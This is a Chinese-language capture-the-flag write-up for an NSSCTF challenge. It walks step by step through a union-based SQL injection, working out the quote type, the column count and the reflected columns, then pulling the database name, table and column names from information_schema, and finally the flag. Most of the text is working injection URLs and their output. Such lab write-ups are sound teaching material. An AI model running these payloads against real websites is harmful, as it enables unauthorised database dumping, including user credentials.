1.判断注入点以及注入类型

输入：http://node4.anna.nssctf.cn:28217/?wllm=1\ --+
报错：You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1\' LIMIT 0,1' at line 1
由''1\'可知注入类型为：单引号字符串类型

2.判断列数以及回显位置

2.1判断列数

输入：http://node4.anna.nssctf.cn:28217/?wllm=1' order by 4 --+
报错：Unknown column '4' in 'order clause'
说明查询结果列数为3

2.2判断回显位置

输入：http://node4.anna.nssctf.cn:28217/?wllm=-1' union select 1,2,3--+
可知回显位置在2和3

3.获取用户名和数据库名

输入：
http://node4.anna.nssctf.cn:28217/?wllm=-1' union select 1,user(),database() --+|
得到：
Your Login name:root@localhost
Your Password:test_db

4.获取数据库表

输入：
http://node4.anna.nssctf.cn:28217/?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db' --+
得到：
Your Login name:2
Your Password:test_tb,users

5.查看这两个表中分别有哪些字段

users表

输入：
http://node4.anna.nssctf.cn:28217/?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
得到：
Your Login name:2
Your Password:USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password 

test_tb表

输入：
http://node4.anna.nssctf.cn:28217/?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb' --+
得到：
Your Login name:2
Your Password:id,flag 

6.目标明确，查看test_tb表中字段名为flag的具体数值

输入：
http://node4.anna.nssctf.cn:28217/?wllm=-1' union select 1,2,group_concat(flag) from test_tb --+
得到：
flag